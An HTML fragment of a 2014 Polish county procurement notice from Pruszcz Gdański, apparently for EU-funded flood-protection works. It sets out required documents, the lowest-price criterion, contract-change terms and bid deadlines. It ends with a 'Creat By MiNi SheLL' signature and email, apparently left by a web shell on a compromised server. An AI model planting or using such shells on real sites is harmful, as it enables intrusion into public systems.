<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy (wzór zał. nr 1 do SIWZ),
2.Podpisany wzór umowy (zał. nr 4 do SIWZ) wraz z zał. nr 3 i 4 do umowy,
3.Oświadczenie o posiadanym potencjale kadrowym (wzór zał.  nr 5 do SIWZ),
4.Wykaz wykonanych robót (zał. nr 6 do SIWZ),
5.Informacja na temat części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcom (wzór zał.  nr 7 do SIWZ),
6.Oświadczenie o przynależności do grupy kapitałowej  (zał. nr 8 do SIWZ),
7.Potwierdzenie wniesienia wadium: potwierdzenie dokonanego przelewu lub oryginał wraz  z potwierdzoną kopią dokumentu stanowiącego wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zgodnie z art. 144 Ustawy Prawo Zamówień Publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednego ze zdarzeń:
1)wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki podatku VAT, mające wpływ na wysokość ceny brutto za świadczoną robotę;
2)zmiany wskazanych w umowie osób uprawnionych do działania po stronie Zamawiającego.
2.Wszelkie zmiany umowy wymagają formy pisemnej w postaci aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 120. Specyfikacja nieodpłatna  i ewentualne koszty przesyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2014 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101
Termin otwarcia ofert: 18.08.2014 r., o godz. 12:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> KOMPLEKSOWE ZABEZPIECZENIE PRZECIWPOWODZIOWE ŻUŁAW - ETAP I - POWIAT GDAŃSKI. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com